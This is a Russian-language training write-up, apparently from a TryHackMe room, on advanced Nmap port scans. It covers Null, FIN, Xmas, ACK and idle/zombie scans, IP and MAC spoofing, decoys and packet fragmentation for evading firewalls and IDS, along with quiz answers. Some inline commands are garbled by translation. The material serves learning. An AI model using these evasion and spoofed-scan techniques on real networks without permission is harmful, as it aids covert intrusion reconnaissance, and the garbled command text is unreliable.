Penetration Tester

День 43. Nmap Advanced Port Scans

2026-03-04T10:19:41.769Z

Изучите продвинутые методы, такие как сканирование с использованием нулевых адресов, FIN-сканирование, сканирование Xmas и сканирование в режиме ожидания (зомби-сканирование), подмена адресов, а также обход брандмауэров и систем обнаружения вторжений.

Task 1. Introduction

Эта комната — третья в серии уроков по Nmap (часть модуля «Введение в сетевую безопасность»). В первых двух комнатах мы изучили обнаружение хостов в режиме реального времени и базовое сканирование портов.

В разделе « Базовое сканирование портов с помощью Nmap» мы рассмотрели флаги TCP и повторили трехэтапное рукопожатие TCP . Для установления соединения TCP требует, чтобы первый пакет имел установленный флаг SYN. Следовательно, мы можем определить, открыт ли порт TCP , по полученному ответу.

Исследователи безопасности и хакеры изучили флаги TCP , показанные на рисунке ниже и объясненные в предыдущем разделе, и начали экспериментировать. Они хотели узнать, что произойдет, если отправить TCP- пакет, не являющийся частью какого-либо текущего TCP- соединения, с одним или несколькими установленными флагами.

Например, флаг ACK устанавливается, когда вы хотите подтвердить получение данных. Сканирование ACK — это как попытка подтвердить данные, которые изначально не были ни отправлены, ни получены. Рассмотрим простую аналогию: кто-то внезапно подходит к вам и говорит: «Да, я вас слышу, пожалуйста, продолжайте», хотя вы ничего не сказали.

В этом разделе рассматриваются расширенные типы сканирования и параметры сканирования. Некоторые из этих типов сканирования могут быть полезны для конкретных систем, в то время как другие полезны в определенных сетевых конфигурациях. Мы рассмотрим следующие типы сканирования портов:

Нулевое сканирование
Сканирование FIN
Рождественское сканирование
Скан Маймона
ACK Scan
Сканирование окна
Пользовательское сканирование

Кроме того, мы рассмотрим следующие вопросы:

Подмена IP-адреса
Подмена MAC-адреса
Сканирование ложной цели
Фрагментированные пакеты
Сканирование в режиме ожидания/ зомби

Мы обсудим варианты и методы обхода брандмауэров и систем обнаружения вторжений . Мы также рассмотрим способы получения более подробной информации от Nmap .

Task 2. TCP Null Scan, FIN Scan, and Xmas Scan

Начнём с следующих трёх типов сканирования:

Нулевое сканирование
Сканирование FIN
Рождественское сканирование

Нулевое сканирование

При сканировании без флагов никакие флаги не устанавливаются; все шесть битов флагов устанавливаются в ноль. Вы можете выбрать этот режим сканирования с помощью соответствующей -sNопции. TCP-пакет без установленных флагов не вызовет никакого ответа при достижении открытого порта, как показано на рисунке ниже. Поэтому с точки зрения Nmap отсутствие ответа при сканировании без флагов указывает на то, что либо порт открыт, либо брандмауэр блокирует пакет.

Однако мы ожидаем, что целевой сервер ответит пакетом RST, если порт закрыт. Следовательно, отсутствие ответа RST позволит нам определить, какие порты не закрыты: открыты или отфильтрованы.

Ниже приведён пример сканирования на отсутствие ответа на сервере Linux. Проведённое нами сканирование на отсутствие ответа успешно выявило шесть открытых портов в целевой системе. Поскольку сканирование на отсутствие ответа основано на предположении, что порт не закрыт, оно не может с уверенностью указывать на то, что эти порты открыты; существует вероятность того, что порты не отвечают из-за правила брандмауэра.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sN MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:30 BST
Nmap scan report for MACHINE_IP
Host is up (0.00066s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE
22/tcp  open|filtered ssh
25/tcp  open|filtered smtp
80/tcp  open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 96.50 seconds

Обратите внимание, что для многих параметров Nmap требуются права root. Если вы не запускаете Nmap от имени root, вам необходимо использовать параметр sudo, как в примере выше -sN.

Сканирование FIN

Сканирование FIN отправляет TCP-пакет с установленным флагом FIN. Вы можете выбрать этот тип сканирования с помощью соответствующей -sF опции. Аналогично, ответ не будет отправлен, если TCP- порт открыт. Опять же, Nmap не может быть уверен, открыт ли порт или же брандмауэр блокирует трафик, связанный с этим TCP- портом.

Однако целевая система должна ответить RST, если порт закрыт. Следовательно, мы сможем узнать, какие порты закрыты, и использовать эти знания для определения открытых или отфильтрованных портов. Стоит отметить, что некоторые межсетевые экраны могут «молча» отбрасывать трафик, не отправляя RST.

Ниже приведён пример сканирования FIN на сервере Linux. Результат весьма похож на результат, полученный нами ранее при использовании сканирования без проверки.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sF MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:32 BST
Nmap scan report for MACHINE_IP
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE
22/tcp  open|filtered ssh
25/tcp  open|filtered smtp
80/tcp  open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 96.52 seconds

Рождественское сканирование

Сканирование «Рождественское» получило свое название в честь рождественских гирлянд. При сканировании «Рождественское» одновременно устанавливаются флаги FIN, PSH и URG. Вы можете выбрать сканирование «Рождественское» с помощью соответствующей опции -sX.

Как и в случае с сканированием Null и сканированием FIN, получение пакета RST означает, что порт закрыт. В противном случае будет указано, что он открыт|отфильтрован.

На следующих двух рисунках показан случай, когда TCP-порт открыт, и случай, когда TCP-порт закрыт.

Приведённый ниже вывод консоли демонстрирует пример сканирования Xmas на сервере Linux. Полученные результаты довольно похожи на результаты сканирования с нулевым значением и сканирования FIN.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sX MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:34 BST
Nmap scan report for MACHINE_IP
Host is up (0.00087s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE
22/tcp  open|filtered ssh
25/tcp  open|filtered smtp
80/tcp  open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 84.85 seconds

Один из сценариев, где эти три типа сканирования могут быть эффективны, — это сканирование цели за межсетевым экраном без сохранения состояния (stateless firewall) . Межсетевой экран без сохранения состояния проверяет, установлен ли входящий пакет флаг SYN для обнаружения попытки подключения. Использование комбинации флагов, не соответствующей пакету SYN, позволяет обмануть межсетевой экран и получить доступ к системе за ним. Однако межсетевой экран с сохранением состояния практически блокирует все такие специально сформированные пакеты и делает этот тип сканирования бесполезным.

Вопрос: При нулевом сканировании, сколько флагов устанавливаются в значение 1?

Ответ: 0

Вопрос: В ходе сканирования FIN, сколько флагов установлено в значение 1?

Ответ: 1

Вопрос: В ходе рождественского сканирования, сколько флагов установлено в значение 1?

Ответ: 3

Вопрос: Запустите виртуальную машину и загрузите AttackBox. После того, как оба компонента будут готовы, откройте терминал на AttackBox и используйте nmap для запуска сканирования FIN целевой виртуальной машины. Сколько портов отображается как открытые|отфильтрованные?

Ответ: 9

Вопрос: Повторите сканирование, запустив сканирование с нулевым количеством портов на целевой виртуальной машине. Сколько портов отображается как открытые/отфильтрованные?

Ответ: 9

Task 3. TCP Maimon Scan

Уриэль Маймон впервые описал это сканирование в 1996 году. В этом сканировании устанавливаются биты FIN и ACK. Целевой объект должен отправить пакет RST в ответ. Однако некоторые системы, основанные на BSD, отбрасывают пакет, если это открытый порт, раскрывающий доступ к открытым портам. Это сканирование не будет работать на большинстве целей, встречающихся в современных сетях; тем не менее, мы включили его в этот раздел, чтобы лучше понять механизм сканирования портов и подход хакеров. Чтобы выбрать этот тип сканирования, используйте соответствующую -sMопцию.

Большинство целевых систем отвечают пакетом RST независимо от того, открыт ли TCP-порт. В таком случае мы не сможем обнаружить открытые порты. На рисунке ниже показано ожидаемое поведение как при открытых, так и при закрытых TCP-портах.

Приведённый ниже вывод консоли — это пример сканирования TCP-портов с помощью Maimon на сервере Linux. Как уже упоминалось, поскольку открытые и закрытые порты ведут себя одинаково, сканирование Maimon не смогло обнаружить ни одного открытого порта в целевой системе.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sM 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:36 BST
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up (0.00095s latency).
All 1000 scanned ports on ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) are closed
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds

Этот тип сканирования не является первым, который обычно выбирают для обнаружения системы; однако важно знать о нем, поскольку никогда не знаешь, когда он может пригодиться.

Вопрос: Сколько флагов установлено при сканировании Maimon?

Ответ: 2

Task 4. TCP ACK, Window, and Custom Scan

В этом задании будет рассмотрено, как выполнить сканирование TCP ACK, сканирование TCP- окна и как создать собственное сканирование флагов.

Сканирование TCP ACK

Начнём с сканирования TCP ACK. Как следует из названия, сканирование ACK отправляет TCP- пакет с установленным флагом ACK. Используйте опцию -sA для выбора этого сканирования. Как показано на рисунке ниже, целевой сервер ответит на ACK сигналом RST независимо от состояния порта. Такое поведение обусловлено тем, что TCP-пакет с установленным флагом ACK должен отправляться только в ответ на полученный TCP-пакет для подтверждения получения данных, в отличие от нашего случая. Следовательно, в простой конфигурации это сканирование не покажет нам, открыт ли целевой порт.

В следующем примере мы просканировали целевую виртуальную машину до установки на нее брандмауэра. Как и ожидалось, нам не удалось узнать, какие порты были открыты.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sA MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:37 BST
Nmap scan report for MACHINE_IP
Host is up (0.0013s latency).
All 1000 scanned ports on MACHINE_IP are unfiltered
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.68 seconds

Такое сканирование было бы полезно, если перед целевым устройством установлен брандмауэр . В результате, на основе того, какие пакеты ACK привели к ответам, вы узнаете, какие порты не были заблокированы брандмауэром . Другими словами, этот тип сканирования больше подходит для обнаружения наборов правил и конфигурации брандмауэра .

После настройки целевой виртуальной машины MACHINE_IP с брандмауэром мы повторили сканирование ACK. На этот раз мы получили интересные результаты. Как видно из приведенного ниже вывода консоли, три порта не блокируются брандмауэром. Этот результат указывает на то, что брандмауэр блокирует все остальные порты, кроме этих трех.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sA MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-07 11:34 BST
Nmap scan report for MACHINE_IP
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT    STATE      SERVICE
22/tcp  unfiltered ssh
25/tcp  unfiltered smtp
80/tcp  unfiltered http
MAC Address: 02:78:C0:D0:4E:E9 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds

Сканирование окна

Ещё один похожий тип сканирования — сканирование TCP- окна. Сканирование TCP- окна практически идентично сканированию ACK; однако оно анализирует поле TCP- окна в возвращаемых пакетах RST. В некоторых системах это может показать, что порт открыт. Вы можете выбрать этот тип сканирования с помощью опции -sW . Как показано на рисунке ниже, мы ожидаем получить пакет RST в ответ на наши «незапрошенные» пакеты ACK, независимо от того, открыт порт или закрыт.

Аналогично, запуск сканирования TCP-окна в системе Linux без брандмауэра не даст много информации. Как видно из приведенного ниже вывода консоли, результаты сканирования окна в системе Linux без брандмауэра не предоставили никакой дополнительной информации по сравнению с ранее выполненным сканированием ACK.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sW MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:38 BST
Nmap scan report for MACHINE_IP
Host is up (0.0011s latency).
All 1000 scanned ports on ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) are closed
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds

Однако, как и следовало ожидать, если мы повторим сканирование TCP- окна на сервере за брандмауэром , мы рассчитываем получить более удовлетворительные результаты. В показанном ниже выводе консоли сканирование TCP- окна указало на то, что три порта обнаружены как закрытые. (Это контрастирует со сканированием ACK, которое пометило те же три порта как нефильтрованные.) Хотя мы знаем, что эти три порта не закрыты, мы понимаем, что они отреагировали по-разному, указывая на то, что брандмауэр их не блокирует.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sW MACHINE_IP

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-07 11:39 BST
Nmap scan report for MACHINE_IP
Host is up (0.00040s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
25/tcp  closed smtp
80/tcp  closed http
MAC Address: 02:78:C0:D0:4E:E9 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds

Пользовательское сканирование

Если вы хотите поэкспериментировать с новой комбинацией флагов TCP , выходящей за рамки встроенных типов сканирования TCP , вы можете сделать это с помощью --scanflags . Например, если вы хотите одновременно установить SYN, RST и FIN, вы можете сделать это с помощью --scanflags RSTSYNFIN . Как показано на рисунке ниже, если вы разрабатываете собственное сканирование, вам необходимо знать, как будут вести себя различные порты, чтобы правильно интерпретировать результаты в различных сценариях.

Наконец, важно отметить, что сканирование ACK и сканирование окна оказались очень эффективными в составлении карты правил брандмауэра . Однако необходимо помнить, что если брандмауэр не блокирует определенный порт, это не обязательно означает, что служба прослушивает этот порт. Например, возможно, правила брандмауэра необходимо обновить, чтобы отразить недавние изменения в работе служб. Следовательно, сканирование ACK и сканирование окна выявляют правила брандмауэра , а не службы.

Вопрос: Сколько флагов устанавливается при сканировании окна TCP?

Ответ: 1

Вопрос: Вы решили поэкспериментировать с пользовательским сканированием TCP, в котором установлен флаг сброса. Что бы вы добавили после --scanflags?

Ответ: RST

Вопрос: Виртуальная машина получила обновление правил брандмауэра. Теперь брандмауэр разрешает новый порт. После того, как вы убедитесь, что завершили работу виртуальной машины из Задания 2, запустите виртуальную машину для этого задания. Запустите AttackBox, если вы еще этого не сделали. Как только обе машины будут готовы, откройте терминал на AttackBox и используйте Nmap для запуска сканирования ACK целевой виртуальной машины. Сколько портов отображается без фильтрации?

Ответ: 4

Вопрос: Какой новый номер порта появился? Чтобы определить новый порт, необходимо сравнить результаты сканирования Задания 2 с результатами этого задания.

Ответ: 443

Вопрос: Есть ли какая-либо услуга, связанная с недавно обнаруженным номером порта? (Да/Нет)

Ответ: N

Task 5. Spoofing and Decoys

В некоторых сетевых конфигурациях вы можете сканировать целевую систему, используя поддельный IP-адрес и даже поддельный MAC-адрес. Такое сканирование полезно только в том случае, если вы можете гарантировать получение ответа. Если вы попытаетесь сканировать целевую систему из случайной сети, используя поддельный IP-адрес, скорее всего, вы не получите никакого ответа, и результаты сканирования могут быть ненадежными.

На следующем рисунке показано, как злоумышленник запускает команду nmap -S SPOOFED_IP MACHINE_IP. В результате Nmap сформирует все пакеты, используя предоставленный исходный IP-адрес SPOOFED_IP. Целевая машина будет отвечать на входящие пакеты, отправляя ответы на целевой IP-адрес SPOOFED_IP. Для того чтобы сканирование работало и давало точные результаты, злоумышленнику необходимо отслеживать сетевой трафик для анализа ответов.

Вкратце, сканирование с использованием поддельного IP-адреса состоит из трех шагов:

Злоумышленник отправляет пакет с поддельным IP-адресом отправителя на целевой компьютер.
Целевой компьютер отвечает, указывая в качестве адреса назначения поддельный IP-адрес.
Злоумышленник перехватывает ответы, чтобы определить открытые порты.

Как правило, предполагается указать сетевой интерфейс с помощью команды -e`ping` и явно отключить сканирование ping -Pn. Поэтому вместо ` nmap -S SPOOFED_IP MACHINE_IPping` вам потребуется использовать команду `ping` nmap -e NET_INTERFACE -Pn -S SPOOFED_IP MACHINE_IP, чтобы явно указать Nmap , какой сетевой интерфейс использовать, и не ожидать ответа на ping. Стоит повторить, что это сканирование будет бесполезно, если система злоумышленника не сможет отслеживать сеть на предмет ответов.

Находясь в той же подсети, что и целевой компьютер, вы также сможете подменить свой MAC-адрес. Вы можете указать исходный MAC-адрес с помощью команды `make - --spoof-mac SPOOFED_MAC...

Подмена IP-адресов работает лишь в минимальном количестве случаев, когда выполняются определенные условия. Поэтому злоумышленник может прибегнуть к использованию поддельных IP-адресов, чтобы затруднить обнаружение. Концепция проста: сканирование должно выглядеть так, будто оно исходит со множества IP-адресов, чтобы IP-адрес злоумышленника затерялся среди них. Как показано на рисунке ниже, сканирование целевой машины будет выглядеть так, будто оно исходит из 3 разных источников, и, следовательно, ответы будут поступать и в поддельные IP-адреса.

Вы можете запустить сканирование с использованием ложных целей, указав конкретный или случайный IP-адрес после команды -D`.`. Например, команда ` nmap -D 10.10.0.1,10.10.0.2,ME MACHINE_IP.` заставит сканирование MACHINE_IP выглядеть так, будто оно исходит с IP-адресов 10.10.0.1, 10.10.0.2, а затем MEкоманда `.` укажет, что ваш IP-адрес должен быть третьим в списке. Другой пример команды `.` — `.` nmap -D 10.10.0.1,10.10.0.2,RND,RND,ME MACHINE_IP, где третий и четвертый исходные IP-адреса назначаются случайным образом, а пятым источником будет IP-адрес злоумышленника. Другими словами, при каждом выполнении последней команды вы ожидаете, что в качестве третьего и четвертого источников ложных целей будут использоваться два новых случайных IP-адреса.

Вопрос: Что нужно добавить в команду sudo nmap MACHINE_IP , чтобы сканирование отображалось так, будто оно выполняется с исходного IP-адреса, 10.10.10.11 а не с вашего IP-адреса?

Ответ: -S 10.10.10.11

Вопрос: Что нужно добавить к команде sudo nmap MACHINE_IP , чтобы сканирование отображалось так, будто оно выполняется с исходных IP-адресов 10.10.20.21 , а 10.10.20.28 также с вашего собственного IP-адреса?

Ответ: -D 10.10.20.21,10.10.20.28,ME

Task 6. Fragmented Packets

Брандмауэр

Брандмауэр — это программное или аппаратное устройство, которое разрешает прохождение пакетов или блокирует их. Он работает на основе правил брандмауэра , которые можно кратко описать как блокировку всего трафика с исключениями или разрешение всего трафика с исключениями. Например, вы можете заблокировать весь трафик к вашему серверу, кроме того, который поступает на ваш веб-сервер. Традиционный брандмауэр проверяет, как минимум, заголовок IP-адреса и заголовок транспортного уровня. Более сложный брандмауэр также попытается проверить данные, передаваемые транспортным уровнем.

ИРС

Система обнаружения вторжений ( IDS ) проверяет сетевые пакеты на наличие определенных поведенческих шаблонов или специфических сигнатур содержимого. Она выдает предупреждение всякий раз, когда обнаруживается вредоносное правило. В дополнение к заголовку IP и заголовку транспортного уровня, IDS проверяет содержимое данных на транспортном уровне и проверяет, соответствует ли оно каким-либо вредоносным шаблонам. Как можно снизить вероятность обнаружения вашей активности Nmap традиционным межсетевым экраном / IDS ? На этот вопрос нелегко ответить; однако, в зависимости от типа межсетевого экрана / IDS , может быть полезно разделить пакет на более мелкие пакеты.

Фрагментированные пакеты

Nmap предоставляет возможность -fфрагментации пакетов. После выбора этой опции IP-данные будут разделены на фрагменты размером не более 8 байт. Добавление еще одного параметра -f( -f -fили -ff) разделит данные на фрагменты по 16 байт вместо 8. Вы можете изменить значение по умолчанию, используя параметр --mtu; однако всегда следует выбирать значение, кратное 8.

Для правильного понимания фрагментации нам необходимо взглянуть на заголовок IP-пакета на рисунке ниже. На первый взгляд он может показаться сложным, но мы видим, что большинство его полей нам известны. В частности, обратите внимание на адрес источника, занимающий 32 бита (4 байта) в четвертой строке, а адрес назначения — еще 4 байта в пятой строке. Данные, которые мы будем фрагментировать на несколько пакетов, выделены красным цветом. Для облегчения сборки на стороне получателя IP использует идентификатор (ID) и смещение фрагмента, показанные во второй строке рисунка ниже.

Давайте сравним выполнение команд `np` sudo nmap -sS -p80 10.20.30.144и ` sudo nmap -sS -p80 -f 10.20.30.144np`. Как вы уже знаете, в первом случае будет использоваться скрытое сканирование TCP SYN на порту 80; однако во второй команде мы запрашиваем у Nmap фрагментацию IP-пакетов.

В первых двух строках мы видим ARP-запрос и ответ. Nmap отправил ARP-запрос, поскольку целевой объект находится в том же Ethernet-соединении. Вторые две строки показывают TCP SYN-пинг и ответ. Пятая строка — это начало сканирования портов; Nmap отправляет TCP SYN-пакет на порт 80. В этом случае заголовок IP составляет 20 байт, а заголовок TCP — 24 байта. Обратите внимание, что минимальный размер заголовка TCP составляет 20 байт.

При фрагментации, запрошенной через параметр `--fragment` -f, 24 байта заголовка TCP будут разделены на фрагменты, кратные 8 байтам, при этом последний фрагмент будет содержать не более 8 байтов заголовка TCP . Поскольку 24 делится на 8, мы получаем 3 фрагмента IP; каждый из них содержит 20 байтов заголовка IP и 8 байтов заголовка TCP . Три фрагмента можно увидеть между пятой и седьмой строками.

Обратите внимание, что если вы добавите -ff(или -f -f), фрагментация данных будет кратна 16. Другими словами, 24 байта заголовка TCP в этом случае будут разделены на два фрагмента IP: первый будет содержать 16 байтов, а второй — 8 байтов заголовка TCP.

С другой стороны, если вы предпочитаете увеличить размер пакетов, чтобы они выглядели безобидными, вы можете использовать опцию --data-length NUM, где num указывает количество байтов, которые вы хотите добавить к вашим пакетам.

Вопрос: Если размер TCP-сегмента составляет 64 байта, и -ff используется опция, сколько IP-фрагментов вы получите?

Ответ:4

Task 7. Idle/Zombie Scan

Подмена исходного IP-адреса может быть отличным способом скрытого сканирования. Однако подмена работает только в определенных сетевых конфигурациях. Она требует наличия возможности отслеживать трафик. Учитывая эти ограничения, подмена IP-адреса может быть малоэффективна; однако мы можем улучшить этот метод с помощью сканирования в режиме ожидания.

Для сканирования в режиме ожидания, или сканирования «зомби» , требуется система, находящаяся в режиме ожидания и подключенная к сети, с которой вы можете взаимодействовать. На практике Nmap будет создавать видимость каждого зондирующего запроса от хоста в режиме ожидания ( зомби ), а затем проверять, получил ли хост в режиме ожидания ( зомби ) какой-либо ответ на поддельный запрос. Это достигается путем проверки значения IP-идентификатора (IP ID) в заголовке IP. Вы можете запустить сканирование в режиме ожидания, используя команду `npm run src` nmap -sI ZOMBIE_IP MACHINE_IP, где ZOMBIE_IP`npm run src` — это IP-адрес хоста в режиме ожидания ( зомби ).

Для проверки доступности (на наличие « зомби-памяти ») порта необходимо выполнить следующие три шага:

Чтобы записать текущий IP-адрес неактивного хоста, необходимо активировать ответ на этом хосте.
Отправьте SYN-пакет на TCP- порт целевого устройства. Пакет должен быть подделан таким образом, чтобы создавалось впечатление, будто он отправлен с IP-адреса неактивного хоста ( зомби-сервера ).
Повторно запустите неактивный компьютер, чтобы он ответил, и вы могли сравнить новый IP-адрес с тем, который был получен ранее.

Давайте объясним на рисунках. На рисунке ниже показана система злоумышленника, которая проверяет неактивный компьютер — многофункциональный принтер. Отправив SYN/ACK, она отвечает пакетом RST, содержащим её вновь увеличенный IP-адрес.

Злоумышленник отправит SYN-пакет на TCP- порт, который он хочет проверить на целевой машине на следующем шаге. Однако этот пакет будет использовать IP-адрес неактивного хоста ( зомби- хоста ) в качестве источника. Могут возникнуть три сценария. В первом сценарии, показанном на рисунке ниже, TCP- порт закрыт; следовательно, целевая машина отвечает неактивному хосту пакетом RST. Неактивный хост не отвечает; следовательно, его IP-адрес не увеличивается.

Во втором сценарии, как показано ниже, TCP- порт открыт, поэтому целевая машина отвечает SYN/ACK неактивному хосту ( зомби- хосту ). Неактивный хост отвечает на этот неожиданный пакет пакетом RST, тем самым увеличивая свой IP-адрес.

В третьем сценарии целевая машина вообще не отвечает из-за правил брандмауэра . Отсутствие ответа приведет к тому же результату, что и при закрытом порту: неактивный хост не увеличит свой IP-адрес.

На заключительном этапе злоумышленник отправляет еще один SYN/ACK на неактивный хост. Неактивный хост отвечает пакетом RST, снова увеличивая IP-адрес на единицу. Злоумышленнику необходимо сравнить IP-адрес пакета RST, полученного на первом этапе, с IP-адресом пакета RST, полученного на третьем этапе. Если разница равна 1, это означает, что порт на целевой машине был закрыт или отфильтрован. Однако, если разница равна 2, это означает, что порт на целевой машине был открыт.

Стоит повторить, что это сканирование называется сканированием в режиме ожидания, поскольку выбор неактивного хоста имеет решающее значение для точности сканирования. Если «неактивный хост» занят, все возвращаемые IP- адреса будут бесполезны.

Вопрос: Вы обнаружили редко используемый сетевой принтер с IP-адресом 10.10.5.5, и решили использовать его в качестве «зомби» при сканировании в режиме ожидания. Какой аргумент следует добавить к команде Nmap?

Ответ: -sI 10.10.5.5

Task 8. Getting More Details

Вы можете добавить эту информацию, --reasonесли хотите, чтобы Nmap предоставлял более подробные сведения о своих рассуждениях и выводах. Рассмотрите два приведенных ниже сканирования системы; однако, последнее добавляет --reason.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sS 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:39 BST
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up (0.0020s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind
143/tcp open  imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.60 seconds

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sS --reason 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:40 BST
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up, received arp-response (0.0020s latency).
Not shown: 994 closed ports
Reason: 994 resets
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 64
25/tcp  open  smtp    syn-ack ttl 64
80/tcp  open  http    syn-ack ttl 64
110/tcp open  pop3    syn-ack ttl 64
111/tcp open  rpcbind syn-ack ttl 64
143/tcp open  imap    syn-ack ttl 64
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds

Указание этого --reasonфлага дает нам четкое представление о том, почему Nmap пришел к выводу, что система работает или определенный порт открыт. В приведенном выше выводе консоли мы видим, что система считается онлайн, поскольку Nmap «получил arp-ответ». С другой стороны, мы знаем, что порт SSH считается открытым, поскольку Nmap получил обратно пакет «syn-ack».

Для получения более подробной информации можно использовать команду `p` -vдля подробного вывода или `p` -vvдля еще большей детализации.

Терминал пентестера

pentester@TryHackMe$ sudo nmap -sS -vv 10.10.252.27

Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:41 BST
Initiating ARP Ping Scan at 10:41
Scanning 10.10.252.27 [1 port]
Completed ARP Ping Scan at 10:41, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:41
Completed Parallel DNS resolution of 1 host. at 10:41, 0.00s elapsed
Initiating SYN Stealth Scan at 10:41
Scanning ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) [1000 ports]
Discovered open port 22/tcp on 10.10.252.27
Discovered open port 25/tcp on 10.10.252.27
Discovered open port 80/tcp on 10.10.252.27
Discovered open port 110/tcp on 10.10.252.27
Discovered open port 111/tcp on 10.10.252.27
Discovered open port 143/tcp on 10.10.252.27
Completed SYN Stealth Scan at 10:41, 1.25s elapsed (1000 total ports)
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up, received arp-response (0.0019s latency).
Scanned at 2021-08-30 10:41:02 BST for 1s
Not shown: 994 closed ports
Reason: 994 resets
PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 64
25/tcp  open  smtp    syn-ack ttl 64
80/tcp  open  http    syn-ack ttl 64
110/tcp open  pop3    syn-ack ttl 64
111/tcp open  rpcbind syn-ack ttl 64
143/tcp open  imap    syn-ack ttl 64
MAC Address: 02:45:BF:8A:2D:6B (Unknown)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.092KB)

Если -vvэто не удовлетворит ваше любопытство, вы можете использовать это -dдля отладки деталей или -ddдля получения еще более подробной информации. Вы можете быть уверены, что использование этого метода -dсоздаст вывод, выходящий за рамки одного экрана.

Вопрос: Запустите AttackBox, если вы еще этого не сделали. Убедившись, что вы завершили работу виртуальной машины из Задания 4, запустите виртуальную машину для этого задания. Дождитесь ее полной загрузки, затем откройте терминал на AttackBox и используйте Nmap для nmap -sS -F --reason MACHINE_IP сканирования виртуальной машины. Какова причина открытия указанных портов?

Ответ: syn-ack

Task 9. Summary

В этом кабинете проводились следующие виды сканирования.

Эти типы сканирования основаны на неожиданной установке флагов TCP для запроса ответа от портов. Сканирование Null, FIN и Xmas вызывает ответ от закрытых портов, в то время как сканирование Maimon, ACK и Window вызывает ответ от открытых и закрытых портов.

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

День 42. Nmap Live Host Discovery

2026-03-04T08:55:19.711Z

Узнайте, как использовать Nmap для обнаружения активных хостов с помощью сканирования ARP, сканирования ICMP и сканирования TCP/UDP с помощью команды ping.

Task 1. Introduction

Nmap , сокращение от Network Mapper, — это бесплатное программное обеспечение с открытым исходным кодом, распространяемое под лицензией GPL, созданное Гордоном Лайоном (Фёдором), экспертом по сетевой безопасности и программистом, работающим с открытым исходным кодом. Nmap — это стандартный инструмент для построения карт сетей, идентификации активных хостов и обнаружения запущенных служб.

Скриптовый движок Nmap позволяет расширить его функциональность, от идентификации служб до эксплуатации уязвимостей. Сканирование с помощью Nmap обычно проходит этапы, показанные на рисунке ниже, хотя многие из них являются необязательными и зависят от аргументов командной строки.

Цели обучения

Когда мы хотим нацелиться на определенную сеть, нам нужен эффективный инструмент, который поможет нам справляться с повторяющимися задачами и ответит на следующие вопросы:

Какие системы работают?
Какие службы работают в этих системах?

В этой комнате дается ответ на первый вопрос о поиске работающих компьютеров. Эта комната — первая из четырех комнат Nmap . Ответ на второй вопрос об обнаружении запущенных служб дается в следующих комнатах Nmap , посвященных сканированию портов.

